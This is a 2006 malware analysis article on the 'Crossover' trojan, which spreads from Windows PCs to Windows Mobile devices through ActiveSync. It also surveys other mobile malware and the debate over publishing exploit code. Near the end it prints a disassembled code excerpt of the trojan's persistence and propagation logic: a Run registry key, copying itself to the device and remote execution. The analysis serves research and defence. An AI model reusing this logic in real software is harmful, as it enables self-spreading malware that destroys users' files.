Analyzing the Crossover Virus: The First PC to Windows Handheld Cross-infector
Date: Mar 8, 2006
Less than two years ago, the very first Pocket PC virus to appear (Dust) was incredibly complex. It achieved a technological breakthrough roughly equivalent to the Win32 Chernobyl virus, which was the first PC-based virus to break into the protected "Ring 0" of the Windows operating system.
Moreover, within a year after Dust's release, we saw numerous "blended" threats. For example, virus writers developed anti-antivirus trojans and have even combined these with the Bluetooth-spreading capability of the Carib (Cabir) virus. So in the space of one year, we saw a viral evolution equivalent to what took 20 years on desktop PCs.
One problem with this rapid evolution of threats is the fact that mobile devices can't support sophisticated antivirus software on current platforms. To give one example, embedded operating systems don't use "interrupts" (system calls to the kernel), so a heuristic virus scanner on the PDA or Smartphone can't hook a specific interrupt that it might otherwise suspect is a virus.
In 2004 Seth Fogie and I co-wrote a rather controversial article on the Dust virus, which we were also to first to analyze. Parts 2 and 3 of that series were independent articles written by Ratter, a virus author from the group 29A. In them he explains that he has never released malware into the wild, and that he was providing the code simply as proof of concept. (For the record, Seth Fogie, my co-author on Part 1 of that series, was strongly against publishing that code.)
Publishing exploit code and source code is still controversial. For example, many commercial companies do not want flaws in their software revealed. However, time has shown that many companies will hide their flaws, to the detriment of the public, unless the actual exploit code is revealed.
In the general security community, it seems that the concept of "security through obscurity" has long been discredited. However, a small number of antivirus vendors are still strongly against re-publishing malware code in any form, even if it is already in the public domain (and readily accessible by anyone via free Internet download). Many of this small minority complained quite vocally. Part of this may be an emotional response. Many antivirus vendors are security firms are sensitive to repeated (although not proven) criticism that they occasionally hire virus writers and black-hat hackers. This may be why the Dust article hit a nerve.
To the credit of Informit, they decided to publish the article anyway. However, we are respectful of everyone's feelings. We believe in freedom of the press, but we also that the press should take great care not to offend anyone, if at all possible. For this reason, we subsequently formed the Mobile Antivirus Researchers Association. This allowed us to share code and examples within a more strictly controlled environment of established researchers.
About the Mobile Antivirus Researchers Association (MARA)
MARA members are composed of antivirus companies, major security companies, CISSPs, university professors, and authors who have written some of the leading technical security books in the world. Members have to abide by a strict, written code of ethics. In fact, if you are interested in the field of mobile research and have the appropriate credentials, then we need you! We invite you to consider joining MARA at http://www.mobileav.org. Membership in MARA is free.
In addition, MARA provides samples of malware to antivirus vendors and other parties that have a legitimate research need. There is absolutely no requirement to become a MARA member. We are happy provide samples even if you choose not to join MARA. In this case, we simply ask you to sign a mutual trading and ethics agreement. Trading malware is a sensitive business; for ethical and legal reasons there should be a written chain of custody. And if an antivirus vendor prefers not to use the MARA agreement, then they are welcome to suggest one that is to their liking.
Recently, we have seen a rapid evolution of "blended" mobile malware. Much of this activity has been seen on the Symbian Smartphone platform. For example, "Skulls" was the second trojan to infect Symbian Series 60 smart phones (the first was Mosquito). When launched, the application claims to be an "Extended Theme Manager by Tee-222." However, it then disables all other applications on the phone and replaces their icons with a skull and crossbones. Worse, it was more recently merged with Caribe to form the first "crossover" malware for Smartphones.
Skulls and Caribe also merged to form Metal Gear, a trojan that masquerades as the game with the same name. Metal Gear uses Skulls to deactivate the devices’ antivirus. Thus, it was the first anti-AV malware for Symbian phones. The malware also drops SEXXXY.sis to the device, an installer that adds code to disable the handset menu button. The Trojan then uses Caribe to transmit itself to new devices
Another example of blending is the Gavno.a Trojan, which is spread via a file called patch.sis (it masquerades as phone patch). Gavno uses a malformed file to crash an internal Symbian process, thus disabling the phone. The effect is to disable all handset buttons and to completely prevent the user from making calls. It may also cause a continual rebooting loop. It is only 2kb in size, and it has already seen variants merged with Caribe to spread to other phones
Other examples of viral evolution include the following:
- Dampig trojan: Notable in that it corrupts the system uninstallation settings, making it more difficult to remove
- Mabir virus: Similar to Cabir, but instead of Bluetooth it uses SMS to spread
- Commwarrior: also tries to disable the onboard antivirus software
- Frontal virus: causes a total system crash of the phone until it is removed
Lastly, a new Symbian Trojan called Doomboot-A that now loads a Commwarrior variant when it infects Smartphones. Doomboot-A destroys the boot process so that the phone is not useable.
Cross-platform mobile malware
A newer development, and one that may be the most troubling, is the new breed of "cross-platform" mobile infectors. For example, the first mobile phone virus capable of infecting a PC was the Cardtrp worm. Cardtrp infects handsets running the Symbian 60 operating system and spreads via Bluetooth and MMS. If the phone has a memory card, it will drop the Win32 PC virus known as Wukill onto the card.
Conversely, the most recent type of malware does the opposite: it now cross-infects mobile devices from a PC. The first example of such malware, and the subject of this article, is a Trojan dubbed "crossover," which spreads from a Win32 desktop machine to a Windows Mobile Pocket PC handheld.
When executed from Win32, the Trojan checks what version the current OS is; if it is not Windows CE or Windows Mobile, the virus makes a copy of itself and puts a startup command in the registry key of local-machine-current-version-run. The trojan then quietly waits for an ActiveSync connection to be detected; it can wait indefinitely. When an ActiveSync connection is detected, the trojan automatically copies itself to the handheld device and remotely executes the trojan. The handheld device is now infected. The Trojan will then begin to delete documents on the handheld.
Crossover is the first known malware that can spread automatically from PC to Windows Mobile via that ActiveSync session. It was released to the Mobile Anti-virus Research Association on February 23, 2006 by its author, who is an anonymous source. This is a live, working proof-of-concept (PoC) Trojan that infects both the host PC and ANY Windows Mobile device that connects via ActiveSync. To the best of our knowledge, at the time of this writing it is not in the wild, so it should not be considered an immediate threat.
Crossover is not a very malignant PoC. If this Trojan were to escape into the public, however, it would cause some damage to both the infected PC and PPC. In short, it will use up system resources and delete files found in the \My Documents directory on the PDA. However, infection is fairly easy to spot and just as easy to remove. This Trojan was not intended for stealth infections as its footprint quickly becomes obvious to the PDA user.
In addition to being able to transfer from the PC to the PDA, the crossover Trojan is also unique to the Windows Mobile world for another reason: the same binary can be executed both on the Pocket PC and on the PC. Internal logic determines the execution path and the resultant effects. In the following section we will describe the details of the Trojan.
On February 23, 2006, MARA received an email from an anonymous source. Included with the email was a single RAR'd file containing an executable named crossover-poc-vx.exe and a text file named cvx.txt. The contents of the txt file are included at the end of this article for you information.
We disassembled the Crossover malware and determined that it was written using the Microsoft .NET platform along with the OpenNETCF SDK that is available for download from http://www.opennetcf.org. In particular, the OpenNETCF provides a Communication library that was heavily used to infect the PDA from the PC. According to our tests, any device or platform that supports the .NET and/or /NET CF framework will allow the crossover malware to execute.
Upon execution, the malware will first check to see what type of host operating system on which it resides. If the OS is not Windows CE or Windows Mobile, it will assume it is a desktop running some flavor of Windows. If the malware does not detect the mobile environment, it will make a copy of itself in the Windows folder and will add a registry entry pointing to the new file at HKLM\Software\Microsoft\Windows\CurrentVersion\Run to execute the new file each and every time the OS is rebooted. Then the executable goes into a loop until an ActiveSync connection is detected.
Note that each time the PC is rebooted, the crossover malware executables in the \Windows directory will execute, thus creating additional executables and registry entries. Eventually, enough copies of the malware will be running so that the PC's performance and/or disc space will cause problems for the operator. There are no checks to see if the malware is running or if the PC has been previous infected. New copies of the malware are created using random numbers (e.g., 925059734.exe).
Once an ActiveSync connection is detected, the malware copies itself over to the PDA and executes the new copy on the PDA from the PC via a CreateProcess function included with the OpenNETCF library. This newly executed copy detects the OS as being Windows CE or Mobile, and then deletes all files (not folders) in the \My Documents directory. It then copies itself to the \Windows directory on PDA and creates a short cut to that newly created executable in the \Windows\StartUp directory on the PDA. The result is that each time the PDA is rebooted, the Crossover malware copies are all executed, which then creates additional copies on the PDA. So even if the PDA user did not notice their files were missing from the \My Documents directory, it would not take long for the PDA's system resources to be exhausted
Testing was done on Windows Mobile 2002, 2003SE and Mobile 5 on three Pocket PC handhelds. The desktops used for testing were Windows XP and Windows Server 2003 in a VMWare environment. The testing was successful in all three cases, and the intended results were achieved. In Windows Mobile 2002, .NET CF 1.0 had to be manually installed because it does not have native support. In Mobile 2003SE and 5, .NET CF is natively supported and thus no modifications were needed. Some Windows Mobile 5 devices (e.g., the Dell Axim X51v) will require the user to allow the malware to execute thanks to its more stringent security settings. However, this added security is an OEM option and is often disabled by the user via a simple registry setting.
It should be noted that the malware is written in .NET, which is easily disassembled from binary back into source code using programs like Anakrino. The following is a short sample of the source code we obtained by disassembling the malware. Comments are included with the code.
local1 = Environment.OSVersion.ToString(); #obtain current OS type
local1 = local1.ToLower(); #convert to lowercase
local2 = local1.IndexOf("ce"); #get location of string ce in OS type
local3 = local1.IndexOf("mobile"); #get index of string mobile in OS type
if (local2 < 1 && local3 < 1) { #if the string ce or mobile exists, then execute
try {
local4 = new RAPI();
local5 = Assembly.GetExecutingAssembly().GetName().CodeBase;
local5 = local5.Replace("/", "\\");
local6 = local5.LastIndexOf("\\");
local7 = local5.Substring(local6 + 1, local5.Length - local6 - 1);
local5 = local5.Remove(0, 8);
local5 = local5.Substring(0, local5.LastIndexOf("\\") + 1);
local8 = local5 + local7;
local9 = new FileInfo(local8);
local10 = new Random(); #create file name
local11 = Convert.ToString(local10.Next()) + ".exe";
local12 = "c:\\windows\\" + local11; #include the path
local13 = new -
AutoStartApps("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\");
# define the registry key
local13.Add(local12); #add new file to registry
local4.Connect(); #try to connect to PDA
while (!(local4.DevicePresent)) #continue looping until PDA present
local4.Connect(); #connect
local9.CopyTo(local12);
local14 = "\\Windows\\" + local11; #define destination
local4.CopyFileToDevice(local12, local14, true); #copy file to PDA
local4.CreateProcess(local14, "0"); #execute file
local4.Disconnect(); #disconnect
}
catch (Exception) {} #if error then catch exception
}
This is only part of the code, but you can see how easy it is to reverse-engineer the binary to learn what it is doing behind the scenes. The code provides clear evidence that the OpenNETCF library was used in the creation of the malware, as well as the Microsoft CF library.
Unlike Dust, Crossover does not require a complex exploit in the host operating system in order to succeed. Nevertheless, it is a significant step forward in mobile malware evolution. It also raises the question: will it be this easy for virus writers to port the tens of thousands of existing PC malware to smaller, handheld PDAs and phones? Let us pray not.